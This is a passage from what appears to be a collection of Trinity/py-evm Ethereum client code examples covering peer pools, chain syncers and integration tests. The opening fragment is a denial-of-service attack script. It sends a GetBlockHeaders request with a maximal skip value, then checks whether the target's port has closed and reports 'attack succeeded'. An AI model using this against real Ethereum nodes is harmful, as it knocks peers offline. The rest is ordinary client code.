                peer.sub_proto.cmd_id_offset, max_headers=100)
            hashes = tuple(header.hash for header in headers)
            peer = cast(ETHPeer, peer)
        else:
            block_hash = '0x41941023680923e0fe4d74a34bdac8141f2540e3ae90623718e47d66d1ca4a2d'
            headers = await cast(ETHPeer, peer).requests.get_block_headers(
                peer.sub_proto.cmd_id_offset, max_headers=100)
            hashes = tuple(header.hash for header in headers)
            peer = cast(LESPeer, peer)
            request_id = 1
        cmd = GetBlockHeaders(peer.sub_proto.cmd_id_offset)
        data = {
            'request_id': 1,
            'query': GetBlockHeadersQuery(
                decode_hex(block_hash), 1, 0xffffffffffffffff, False),
        }
        header, body = cmd.encode(data)
        peer.sub_proto.send(header, body)
        await asyncio.sleep(1)
        result = port_probe(ip, port)
        if not result:
            peer_pool.logger.info('The port is closed, attack succeeded...')
            os.kill(os.getpid(), signal.SIGINT)

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint() -> None:
        await sigint_received.wait()
        await peer_pool.cancel()
        loop.stop()

    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(attack())
    loop.run_forever()
    loop.close()
Example no. 22
def _test() -> None:
    import argparse
    from pathlib import Path
    import signal

    from evm.db.backends.level import LevelDB
    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER

    from p2p import ecies
    from p2p.constants import ROPSTEN_BOOTNODES
    from p2p.peer import ETHPeer

    from trinity.utils.chains import load_nodekey

    from tests.p2p.integration_test_helpers import FakeAsyncHeaderDB
    from tests.p2p.integration_test_helpers import FakeAsyncChainDB, FakeAsyncRopstenChain

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-debug', action="store_true")
    parser.add_argument('-bootnodes', type=str, default=[])
    parser.add_argument('-nodekey', type=str)

    args = parser.parse_args()

    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s %(levelname)s: %(message)s',
                        datefmt='%H:%M:%S')
    log_level = logging.INFO
    if args.debug:
        log_level = logging.DEBUG
    logging.getLogger('p2p.server.Server').setLevel(log_level)

    loop = asyncio.get_event_loop()
    db = LevelDB(args.db)
    headerdb = FakeAsyncHeaderDB(db)
    chaindb = FakeAsyncChainDB(db)
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    chain = FakeAsyncRopstenChain(db)

    # NOTE: Since we may create a different priv/pub key pair every time we run this, remote nodes
    # may try to establish a connection using the pubkey from one of our previous runs, which will
    # result in lots of DecryptionErrors in receive_handshake().
    if args.nodekey:
        privkey = load_nodekey(Path(args.nodekey))
    else:
        privkey = ecies.generate_privkey()

    port = 30303
    if args.bootnodes:
        bootstrap_nodes = args.bootnodes.split(',')
    else:
        bootstrap_nodes = ROPSTEN_BOOTNODES
    bootstrap_nodes = [Node.from_uri(enode) for enode in bootstrap_nodes]

    server = Server(
        privkey,
        port,
        chain,
        chaindb,
        headerdb,
        db,
        RopstenChain.network_id,
        peer_class=ETHPeer,
        bootstrap_nodes=bootstrap_nodes,
    )

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint():
        await sigint_received.wait()
        await server.cancel()
        loop.stop()

    loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(server.run())
    loop.run_forever()
    loop.close()
Example no. 23
async def _main() -> None:
    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-light', action="store_true")
    parser.add_argument('-nodekey', type=str)
    parser.add_argument('-enode',
                        type=str,
                        required=False,
                        help="The enode we should connect to")
    parser.add_argument('-debug', action="store_true")
    args = parser.parse_args()

    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s %(levelname)s: %(message)s',
                        datefmt='%H:%M:%S')
    log_level = logging.INFO
    if args.debug:
        log_level = logging.DEBUG

    loop = asyncio.get_event_loop()

    base_db = LevelDB(args.db)
    headerdb = AsyncHeaderDB(AtomicDB(base_db))
    chaindb = AsyncChainDB(AtomicDB(base_db))
    try:
        genesis = chaindb.get_canonical_block_header_by_number(BlockNumber(0))
    except HeaderNotFound:
        genesis = ROPSTEN_GENESIS_HEADER
        chaindb.persist_header(genesis)

    peer_pool_class: Type[Union[ETHPeerPool, LESPeerPool]] = ETHPeerPool
    if args.light:
        peer_pool_class = LESPeerPool

    chain_class: Union[Type[AsyncRopstenChain], Type[AsyncMainnetChain]]
    if genesis.hash == ROPSTEN_GENESIS_HEADER.hash:
        chain_id = RopstenChain.chain_id
        vm_config = ROPSTEN_VM_CONFIGURATION
        chain_class = AsyncRopstenChain
    elif genesis.hash == MAINNET_GENESIS_HEADER.hash:
        chain_id = MainnetChain.chain_id
        vm_config = MAINNET_VM_CONFIGURATION  # type: ignore
        chain_class = AsyncMainnetChain
    else:
        raise RuntimeError("Unknown genesis: %s" % genesis)

    if args.nodekey:
        privkey = load_nodekey(Path(args.nodekey))
    else:
        privkey = ecies.generate_privkey()

    context = ChainContext(
        headerdb=headerdb,
        network_id=chain_id,
        vm_configuration=vm_config,
        client_version_string=construct_trinity_client_identifier(),
        listen_port=30309,
        p2p_version=DEVP2P_V5,
    )

    peer_pool = peer_pool_class(privkey=privkey, context=context)

    if args.enode:
        nodes = tuple([Node.from_uri(args.enode)])
    else:
        nodes = DEFAULT_PREFERRED_NODES[chain_id]

    async with background_asyncio_service(peer_pool) as manager:
        manager.run_task(connect_to_peers_loop(peer_pool,
                                               nodes))  # type: ignore
        chain = chain_class(base_db)
        syncer: Service = None
        if args.light:
            syncer = LightChainSyncer(chain, headerdb,
                                      cast(LESPeerPool, peer_pool))
        else:
            syncer = RegularChainSyncer(chain, chaindb,
                                        cast(ETHPeerPool, peer_pool))
        logging.getLogger().setLevel(log_level)

        sigint_received = asyncio.Event()
        for sig in [signal.SIGINT, signal.SIGTERM]:
            loop.add_signal_handler(sig, sigint_received.set)

        async def exit_on_sigint() -> None:
            await sigint_received.wait()
            syncer.get_manager().cancel()

        asyncio.ensure_future(exit_on_sigint())

        async with background_asyncio_service(syncer) as syncer_manager:
            await syncer_manager.wait_finished()
Example no. 24
def _test() -> None:
    import argparse
    from pathlib import Path
    import signal
    from p2p import ecies
    from p2p.kademlia import Node
    from eth.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER, ROPSTEN_VM_CONFIGURATION
    from eth.chains.mainnet import MainnetChain, MAINNET_GENESIS_HEADER, MAINNET_VM_CONFIGURATION
    from eth.db.backends.level import LevelDB
    from tests.trinity.core.integration_test_helpers import (
        FakeAsyncChainDB, FakeAsyncMainnetChain, FakeAsyncRopstenChain,
        FakeAsyncHeaderDB, connect_to_peers_loop)
    from trinity.constants import DEFAULT_PREFERRED_NODES
    from trinity.protocol.common.context import ChainContext
    from trinity._utils.chains import load_nodekey

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-fast', action="store_true")
    parser.add_argument('-light', action="store_true")
    parser.add_argument('-nodekey', type=str)
    parser.add_argument('-enode',
                        type=str,
                        required=False,
                        help="The enode we should connect to")
    parser.add_argument('-debug', action="store_true")
    args = parser.parse_args()

    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s %(levelname)s: %(message)s',
                        datefmt='%H:%M:%S')
    log_level = logging.INFO
    if args.debug:
        log_level = logging.DEBUG

    loop = asyncio.get_event_loop()

    base_db = LevelDB(args.db)
    headerdb = FakeAsyncHeaderDB(base_db)
    chaindb = FakeAsyncChainDB(base_db)
    try:
        genesis = chaindb.get_canonical_block_header_by_number(0)
    except HeaderNotFound:
        genesis = ROPSTEN_GENESIS_HEADER
        chaindb.persist_header(genesis)

    peer_pool_class: Type[Union[ETHPeerPool, LESPeerPool]] = ETHPeerPool
    if args.light:
        peer_pool_class = LESPeerPool

    if genesis.hash == ROPSTEN_GENESIS_HEADER.hash:
        network_id = RopstenChain.network_id
        vm_config = ROPSTEN_VM_CONFIGURATION  # type: ignore
        chain_class = FakeAsyncRopstenChain
    elif genesis.hash == MAINNET_GENESIS_HEADER.hash:
        network_id = MainnetChain.network_id
        vm_config = MAINNET_VM_CONFIGURATION  # type: ignore
        chain_class = FakeAsyncMainnetChain
    else:
        raise RuntimeError("Unknown genesis: %s" % genesis)

    if args.nodekey:
        privkey = load_nodekey(Path(args.nodekey))
    else:
        privkey = ecies.generate_privkey()

    context = ChainContext(
        headerdb=headerdb,
        network_id=network_id,
        vm_configuration=vm_config,
    )

    peer_pool = peer_pool_class(privkey=privkey, context=context)

    if args.enode:
        nodes = tuple([Node.from_uri(args.enode)])
    else:
        nodes = DEFAULT_PREFERRED_NODES[network_id]

    asyncio.ensure_future(peer_pool.run())
    peer_pool.run_task(connect_to_peers_loop(peer_pool, nodes))
    chain = chain_class(base_db)
    syncer: BaseHeaderChainSyncer = None
    if args.fast:
        syncer = FastChainSyncer(chain, chaindb, cast(ETHPeerPool, peer_pool))
    elif args.light:
        syncer = LightChainSyncer(chain, headerdb,
                                  cast(LESPeerPool, peer_pool))
    else:
        syncer = RegularChainSyncer(chain, chaindb,
                                    cast(ETHPeerPool, peer_pool))
    syncer.logger.setLevel(log_level)
    syncer.min_peers_to_sync = 1

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint() -> None:
        await sigint_received.wait()
        await peer_pool.cancel()
        await syncer.cancel()
        loop.stop()

    async def run() -> None:
        await syncer.run()
        syncer.logger.info("run() finished, exiting")
        sigint_received.set()

    # loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(run())
    loop.run_forever()
    loop.close()
Example no. 25
def _main() -> None:
    logging.basicConfig(level=DEBUG2_LEVEL_NUM, format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-enode', type=str, help="The enode we should connect to", required=True)
    parser.add_argument('-mainnet', action='store_true')
    parser.add_argument('-light', action='store_true', help="Connect as a light node")
    args = parser.parse_args()

    peer_class: Union[Type[ETHPeer], Type[LESPeer]]
    pool_class: Union[Type[ETHPeerPool], Type[LESPeerPool]]

    if args.light:
        peer_class = LESPeer
        pool_class = LESPeerPool
    else:
        peer_class = ETHPeer
        pool_class = ETHPeerPool

    if args.mainnet:
        chain_id = MainnetChain.chain_id
        vm_config = MAINNET_VM_CONFIGURATION
        genesis = MAINNET_GENESIS_HEADER
    else:
        chain_id = RopstenChain.chain_id
        vm_config = ROPSTEN_VM_CONFIGURATION
        genesis = ROPSTEN_GENESIS_HEADER

    headerdb = AsyncHeaderDB(AtomicDB(MemoryDB()))
    headerdb.persist_header(genesis)
    loop = asyncio.get_event_loop()
    nodes = [Node.from_uri(args.enode)]

    context = ChainContext(
        headerdb=headerdb,
        network_id=chain_id,
        vm_configuration=vm_config,
        client_version_string=construct_trinity_client_identifier(),
        listen_port=30309,
        p2p_version=DEVP2P_V5,
    )
    peer_pool = pool_class(
        privkey=ecies.generate_privkey(),
        context=context,
    )

    asyncio.ensure_future(peer_pool.run())
    peer_pool.run_task(connect_to_peers_loop(peer_pool, nodes))

    async def request_stuff() -> None:
        # Request some stuff from ropsten's block 2440319
        # (https://ropsten.etherscan.io/block/2440319), just as a basic test.
        nonlocal peer_pool
        while not peer_pool.connected_nodes:
            peer_pool.logger.info("Waiting for peer connection...")
            await asyncio.sleep(0.2)
        peer = peer_pool.highest_td_peer
        headers = await cast(ETHPeer, peer).eth_api.get_block_headers(
            BlockNumber(2440319),
            max_headers=100
        )
        hashes = tuple(header.hash for header in headers)
        if peer_class == ETHPeer:
            peer = cast(ETHPeer, peer)
            peer.eth_api.send_get_block_bodies(hashes)
            peer.eth_api.send_get_receipts(hashes)
        else:
            peer = cast(LESPeer, peer)
            peer.les_api.send_get_block_bodies(list(hashes))
            peer.les_api.send_get_receipts(hashes[0])

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint() -> None:
        await sigint_received.wait()
        await peer_pool.cancel()
        loop.stop()

    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(request_stuff())
    loop.set_debug(True)
    loop.run_forever()
    loop.close()
Example no. 26
async def test_lightchain_integration(request, event_loop, caplog):
    """Test LightChainSyncer/LightPeerChain against a running geth instance.

    In order to run this you need to pass the following to pytest:

        pytest --integration --capture=no --enode=...

    If you don't have any geth testnet data ready, it is very quick to generate some with:

        geth --testnet --syncmode full

    You only need the first 11 blocks for this test to succeed. Then you can restart geth with:

        geth --testnet --lightserv 90 --nodiscover
    """
    # TODO: Implement a pytest fixture that runs geth as above, so that we don't need to run it
    # manually.
    if not pytest.config.getoption("--integration"):
        pytest.skip("Not asked to run integration tests")

    # will almost certainly want verbose logging in a failure
    caplog.set_level(logging.DEBUG)

    remote = Node.from_uri(pytest.config.getoption("--enode"))
    base_db = MemoryDB()
    chaindb = FakeAsyncChainDB(base_db)
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    headerdb = FakeAsyncHeaderDB(base_db)
    peer_pool = PeerPool(
        LESPeer,
        FakeAsyncHeaderDB(base_db),
        ROPSTEN_NETWORK_ID,
        ecies.generate_privkey(),
        ROPSTEN_VM_CONFIGURATION,
    )
    chain = FakeAsyncRopstenChain(base_db)
    syncer = LightChainSyncer(chain, chaindb, peer_pool)
    syncer.min_peers_to_sync = 1
    peer_chain = LightPeerChain(headerdb, peer_pool)

    asyncio.ensure_future(peer_pool.run())
    asyncio.ensure_future(connect_to_peers_loop(peer_pool, tuple([remote])))
    asyncio.ensure_future(peer_chain.run())
    asyncio.ensure_future(syncer.run())
    # Yield control to give the LightChainSyncer a chance to start
    await asyncio.sleep(0)

    def finalizer():
        event_loop.run_until_complete(peer_pool.cancel())
        event_loop.run_until_complete(peer_chain.cancel())
        event_loop.run_until_complete(syncer.cancel())

    request.addfinalizer(finalizer)

    n = 11

    # Wait for the chain to sync a few headers.
    async def wait_for_header_sync(block_number):
        while headerdb.get_canonical_head().block_number < block_number:
            await asyncio.sleep(0.1)

    await asyncio.wait_for(wait_for_header_sync(n), 5)

    # https://ropsten.etherscan.io/block/11
    header = headerdb.get_canonical_block_header_by_number(n)
    body = await peer_chain.get_block_body_by_hash(header.hash)
    assert len(body['transactions']) == 15

    receipts = await peer_chain.get_receipts(header.hash)
    assert len(receipts) == 15
    assert encode_hex(keccak(rlp.encode(receipts[0]))) == (
        '0xf709ed2c57efc18a1675e8c740f3294c9e2cb36ba7bb3b89d3ab4c8fef9d8860')

    assert len(peer_pool) == 1
    head_info = peer_pool.highest_td_peer.head_info
    head = await peer_chain.get_block_header_by_hash(head_info.block_hash)
    assert head.block_number == head_info.block_number

    # In order to answer queries for contract code, geth needs the state trie entry for the block
    # we specify in the query, but because of fast sync we can only assume it has that for recent
    # blocks, so we use the current head to lookup the code for the contract below.
    # https://ropsten.etherscan.io/address/0x95a48dca999c89e4e284930d9b9af973a7481287
    contract_addr = decode_hex('0x8B09D9ac6A4F7778fCb22852e879C7F3B2bEeF81')
    contract_code = await peer_chain.get_contract_code(head.hash,
                                                       contract_addr)
    assert encode_hex(contract_code) == '0x600060006000600060006000356000f1'

    account = await peer_chain.get_account(head.hash, contract_addr)
    assert account.code_hash == keccak(contract_code)
    assert account.balance == 0
Example no. 27
    def __init__(self,
                 network_id: int,
                 genesis_config: Dict[str, Any] = None,
                 max_peers: int = 25,
                 trinity_root_dir: str = None,
                 data_dir: str = None,
                 nodekey_path: str = None,
                 logfile_path: str = None,
                 nodekey: PrivateKey = None,
                 sync_mode: str = SYNC_FULL,
                 port: int = 30303,
                 use_discv5: bool = False,
                 preferred_nodes: Tuple[KademliaNode, ...] = None,
                 bootstrap_nodes: Tuple[KademliaNode, ...] = None) -> None:
        self.network_id = network_id
        self.max_peers = max_peers
        self.sync_mode = sync_mode
        self.port = port
        self.use_discv5 = use_discv5

        if genesis_config is not None:
            self.genesis_config = genesis_config
        elif network_id in PRECONFIGURED_NETWORKS:
            self.genesis_config = _load_preconfigured_genesis_config(
                network_id)
        else:
            raise TypeError(
                "No `genesis_config` was provided and the `network_id` is not "
                "in the known preconfigured networks.  Cannot initialize "
                "ChainConfig")

        if trinity_root_dir is not None:
            self.trinity_root_dir = trinity_root_dir

        if not preferred_nodes and self.network_id in DEFAULT_PREFERRED_NODES:
            self.preferred_nodes = DEFAULT_PREFERRED_NODES[self.network_id]
        else:
            self.preferred_nodes = preferred_nodes

        if bootstrap_nodes is None:
            if self.network_id == MAINNET_NETWORK_ID:
                self.bootstrap_nodes = tuple(
                    KademliaNode.from_uri(enode)
                    for enode in MAINNET_BOOTNODES)
            elif self.network_id == ROPSTEN_NETWORK_ID:
                self.bootstrap_nodes = tuple(
                    KademliaNode.from_uri(enode)
                    for enode in ROPSTEN_BOOTNODES)
        else:
            self.bootstrap_nodes = bootstrap_nodes

        if data_dir is not None:
            self.data_dir = data_dir

        if nodekey is not None and nodekey_path is not None:
            raise ValueError(
                "It is invalid to provide both a `nodekey` and a `nodekey_path`"
            )
        elif nodekey_path is not None:
            self.nodekey_path = nodekey_path
        elif nodekey is not None:
            self.nodekey = nodekey

        if logfile_path is not None:
            self.logfile_path = logfile_path
Example no. 28
def _test() -> None:
    """
    Create a Peer instance connected to a local geth instance and log messages exchanged with it.

    Use the following command line to run geth:

        ./build/bin/geth -vmodule p2p=4,p2p/discv5=0,eth/*=0 \
          -nodekeyhex 45a915e4d060149eb4365960e6a7a45f334393093061116b197e3240065ff2d8 \
          -testnet -lightserv 90
    """
    import argparse
    import signal
    from eth.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER, ROPSTEN_VM_CONFIGURATION
    from eth.db.backends.memory import MemoryDB
    from eth.tools.logging import TRACE_LEVEL_NUM
    from trinity.protocol.eth.peer import ETHPeer
    from trinity.protocol.les.peer import LESPeer
    from tests.trinity.core.integration_test_helpers import FakeAsyncHeaderDB, connect_to_peers_loop
    logging.basicConfig(level=TRACE_LEVEL_NUM,
                        format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-enode',
                        type=str,
                        help="The enode we should connect to")
    parser.add_argument('-light',
                        action='store_true',
                        help="Connect as a light node")
    args = parser.parse_args()

    peer_class: Type[BasePeer] = ETHPeer
    if args.light:
        peer_class = LESPeer
    headerdb = FakeAsyncHeaderDB(MemoryDB())
    headerdb.persist_header(ROPSTEN_GENESIS_HEADER)
    network_id = RopstenChain.network_id
    loop = asyncio.get_event_loop()
    nodes = [Node.from_uri(args.enode)]

    peer_pool = PeerPool(
        peer_class,
        headerdb,
        network_id,
        ecies.generate_privkey(),
        ROPSTEN_VM_CONFIGURATION,
    )

    asyncio.ensure_future(peer_pool.run())
    peer_pool.run_task(connect_to_peers_loop(peer_pool, nodes))

    async def request_stuff() -> None:
        # Request some stuff from ropsten's block 2440319
        # (https://ropsten.etherscan.io/block/2440319), just as a basic test.
        nonlocal peer_pool
        while not peer_pool.connected_nodes:
            peer_pool.logger.info("Waiting for peer connection...")
            await asyncio.sleep(0.2)
        peer = peer_pool.highest_td_peer
        headers = await cast(ETHPeer, peer).requests.get_block_headers(
            2440319, max_headers=100)
        hashes = tuple(header.hash for header in headers)
        if peer_class == ETHPeer:
            peer = cast(ETHPeer, peer)
            peer.sub_proto._send_get_block_bodies(hashes)
            peer.sub_proto._send_get_receipts(hashes)
        else:
            peer = cast(LESPeer, peer)
            request_id = 1
            peer.sub_proto.send_get_block_bodies(list(hashes), request_id + 1)
            peer.sub_proto.send_get_receipts(hashes[0], request_id + 2)

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint() -> None:
        await sigint_received.wait()
        await peer_pool.cancel()
        loop.stop()

    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(request_stuff())
    loop.set_debug(True)
    loop.run_forever()
    loop.close()
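
The shutdown wiring above (a signal handler that only sets an `asyncio.Event`, awaited by a dedicated cleanup coroutine) is independent of the p2p machinery; a self-contained sketch of just that pattern is:

import asyncio
import signal

async def main() -> None:
    loop = asyncio.get_event_loop()
    stop = asyncio.Event()

    # Translate SIGINT/SIGTERM into an Event; handlers must not block, so they
    # only set the flag and leave the real cleanup to a coroutine.
    # (add_signal_handler is only available on Unix event loops.)
    for sig in (signal.SIGINT, signal.SIGTERM):
        loop.add_signal_handler(sig, stop.set)

    print("Running; press Ctrl-C to stop.")
    await stop.wait()
    print("Signal received, cleaning up and exiting.")

asyncio.get_event_loop().run_until_complete(main())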
Example n. 29
def _test() -> None:
    import argparse
    import signal
    from p2p import ecies
    from p2p.kademlia import Node
    from p2p.peer import DEFAULT_PREFERRED_NODES
    from eth.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER, ROPSTEN_VM_CONFIGURATION
    from eth.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import (
        FakeAsyncChainDB, FakeAsyncRopstenChain, FakeAsyncHeaderDB, connect_to_peers_loop)

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-fast', action="store_true")
    parser.add_argument('-light', action="store_true")
    parser.add_argument('-enode', type=str, required=False, help="The enode we should connect to")
    parser.add_argument('-debug', action="store_true")
    args = parser.parse_args()

    logging.basicConfig(
        level=logging.INFO, format='%(asctime)s %(levelname)s: %(message)s', datefmt='%H:%M:%S')
    log_level = logging.INFO
    if args.debug:
        log_level = logging.DEBUG

    loop = asyncio.get_event_loop()

    base_db = LevelDB(args.db)
    chaindb = FakeAsyncChainDB(base_db)
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    headerdb = FakeAsyncHeaderDB(base_db)

    peer_class: Type[HeaderRequestingPeer] = ETHPeer
    if args.light:
        peer_class = LESPeer
    network_id = RopstenChain.network_id
    privkey = ecies.generate_privkey()
    peer_pool = PeerPool(peer_class, headerdb, network_id, privkey, ROPSTEN_VM_CONFIGURATION)
    if args.enode:
        nodes = tuple([Node.from_uri(args.enode)])
    else:
        nodes = DEFAULT_PREFERRED_NODES[network_id]

    asyncio.ensure_future(peer_pool.run())
    asyncio.ensure_future(connect_to_peers_loop(peer_pool, nodes))
    chain = FakeAsyncRopstenChain(base_db)
    syncer: BaseHeaderChainSyncer = None
    if args.fast:
        syncer = FastChainSyncer(chain, chaindb, peer_pool)
    elif args.light:
        syncer = LightChainSyncer(chain, headerdb, peer_pool)
    else:
        syncer = RegularChainSyncer(chain, chaindb, peer_pool)
    syncer.logger.setLevel(log_level)
    syncer.min_peers_to_sync = 1

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint() -> None:
        await sigint_received.wait()
        await peer_pool.cancel()
        await syncer.cancel()
        loop.stop()

    async def run() -> None:
        await syncer.run()
        syncer.logger.info("run() finished, exiting")
        sigint_received.set()

    # loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(run())
    loop.run_forever()
    loop.close()
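
Unlike the in-memory header DBs of the earlier examples, this one opens an on-disk LevelDB at the path passed via `-db`. A minimal sketch of that backend in isolation (same import as above; py-evm's LevelDB wraps plyvel and exposes a dict-like byte-key interface, and the path below is a throwaway assumption):

from eth.db.backends.level import LevelDB

# Throwaway path, purely illustrative; requires the plyvel dependency that
# py-evm's LevelDB backend is built on.
db = LevelDB('/tmp/example-chaindata')
db[b'greeting'] = b'hello'
assert db[b'greeting'] == b'hello'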
Example n. 30
async def _main() -> None:
    parser = argparse.ArgumentParser()
    parser.add_argument('-enode',
                        type=str,
                        help="The enode we should connect to",
                        required=True)
    parser.add_argument('-mainnet', action='store_true')
    parser.add_argument('-light',
                        action='store_true',
                        help="Connect as a light node")
    parser.add_argument('-debug', action="store_true")
    args = parser.parse_args()

    log_level = logging.INFO
    if args.debug:
        log_level = DEBUG2_LEVEL_NUM
    logging.basicConfig(level=log_level,
                        format='%(asctime)s %(levelname)s: %(message)s',
                        datefmt='%H:%M:%S')

    peer_class: Union[Type[ETHPeer], Type[LESPeer]]
    pool_class: Union[Type[ETHPeerPool], Type[LESPeerPool]]

    if args.light:
        peer_class = LESPeer
        pool_class = LESPeerPool
    else:
        peer_class = ETHPeer
        pool_class = ETHPeerPool

    bootnodes: Tuple[str, ...]
    if args.mainnet:
        bootnodes = MAINNET_BOOTNODES
        chain_id = MainnetChain.chain_id
        vm_config = MAINNET_VM_CONFIGURATION
        genesis = MAINNET_GENESIS_HEADER
    else:
        bootnodes = ROPSTEN_BOOTNODES
        chain_id = RopstenChain.chain_id
        vm_config = ROPSTEN_VM_CONFIGURATION
        genesis = ROPSTEN_GENESIS_HEADER

    headerdb = AsyncHeaderDB(AtomicDB(MemoryDB()))
    headerdb.persist_header(genesis)
    loop = asyncio.get_event_loop()
    if args.enode == "bootnodes":
        nodes = [Node.from_uri(enode) for enode in bootnodes]
    else:
        nodes = [Node.from_uri(args.enode)]

    context = ChainContext(
        headerdb=headerdb,
        network_id=chain_id,
        vm_configuration=vm_config,
        client_version_string=construct_trinity_client_identifier(),
        listen_port=30309,
        p2p_version=DEVP2P_V5,
    )
    peer_pool = pool_class(privkey=ecies.generate_privkey(), context=context)

    async def request_stuff() -> None:
        nonlocal peer_pool
        # Request some stuff from ropsten's block 2440319
        # (https://ropsten.etherscan.io/block/2440319), just as a basic test.
        peer = peer_pool.highest_td_peer
        if peer_class == ETHPeer:
            peer = cast(ETHPeer, peer)
            headers = await peer.eth_api.get_block_headers(
                BlockNumber(2440319), max_headers=100)
            hashes = tuple(header.hash for header in headers)
            peer.eth_api.send_get_block_bodies(hashes)
            peer.eth_api.send_get_receipts(hashes)
        else:
            peer = cast(LESPeer, peer)
            headers = await peer.les_api.get_block_headers(
                BlockNumber(2440319), max_headers=100)
            # The ETH branch's `hashes` is not in scope here, so derive it again.
            hashes = tuple(header.hash for header in headers)
            peer.les_api.send_get_block_bodies(list(hashes))
            peer.les_api.send_get_receipts(hashes[:1])

    async with background_asyncio_service(peer_pool) as manager:
        for sig in [signal.SIGINT, signal.SIGTERM]:
            loop.add_signal_handler(sig, manager.cancel)

        await peer_pool.connect_to_nodes(nodes)
        await asyncio.sleep(1)
        if len(peer_pool) == 0:
            peer_pool.logger.error(f"Unable to connect to any of {nodes}")
            return

        try:
            await asyncio.wait_for(request_stuff(), timeout=2)
        except asyncio.TimeoutError:
            peer_pool.logger.error("Timeout waiting for replies")
        await manager.wait_finished()
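
Example n. 30 manages the peer pool's lifecycle with `background_asyncio_service` from the `async-service` library rather than the hand-rolled signal/Event wiring of the earlier examples. A minimal sketch of that pattern with a trivial service (the `Ticker` class is invented for illustration; the `Service`/manager calls are the ones the example above already relies on, so treat this as a sketch under those assumptions):

import asyncio

from async_service import Service, background_asyncio_service

class Ticker(Service):
    # A throwaway service: prints until its manager cancels it.
    async def run(self) -> None:
        while self.manager.is_running:
            print("tick")
            await asyncio.sleep(0.5)

async def main() -> None:
    async with background_asyncio_service(Ticker()) as manager:
        await asyncio.sleep(2)
        manager.cancel()
        await manager.wait_finished()

asyncio.run(main())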